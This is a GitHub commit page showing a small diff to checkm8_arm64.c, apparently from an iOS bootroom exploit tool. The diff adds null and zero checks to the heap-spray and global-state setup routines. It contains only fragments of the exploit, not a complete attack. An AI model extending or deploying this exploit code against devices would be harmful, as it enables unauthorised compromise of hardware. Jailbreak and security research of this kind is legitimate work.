Skip to content

Commit

Permalink
err
Browse files Browse the repository at this point in the history
  • Loading branch information
@dora2-iOS
dora2-iOS committed Jun 2, 2022
1 parent 242f3fb commit 1dfcdee
Showing 1 changed file with 8 additions and 2 deletions.
10 changes: 8 additions & 2 deletions src/exploit/checkm8_arm64.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -177,18 +177,21 @@ static void pre_retry(io_client_t client, unsigned int i)
static bool set_global_state(io_client_t client, int flags)
{
transfer_t result;
unsigned int val;
unsigned int val = 0;
UInt32 sent = 0;
unsigned int i = 0;

if((flags & CHECKM8_A9X_A11) || (flags & CHECKM8_A7)) {
val = 1408; // A7, A9X-A11
} else if((flags & CHECKM8_A8_A9) && !(flags & USE_HEAP_SPRAY_A8_A9)) {
val = 704; // A8-A9
} else {
} else if((flags & CHECKM8_A8_A9) && (flags & USE_HEAP_SPRAY_A8_A9)) {
val = 1344;
}

if(!val)
return FALSE;

memset(&blank, '\x41', DFU_MAX_TRANSFER_SZ);

/* val haxx
Expand Down Expand Up @@ -258,6 +261,9 @@ static bool heap_occupation(io_client_t client, checkra1n_payload_t payload, int

if(has_heap_spray(flags)) {
// A7, A9X-A11
if(!leak || !push)
return FALSE;

result = usb_req_stall(client);
DEBUGLOG("(1/5) %x", result.ret);
usleep(100000);
Expand Down

0 comments on commit 1dfcdee

Please sign in to comment.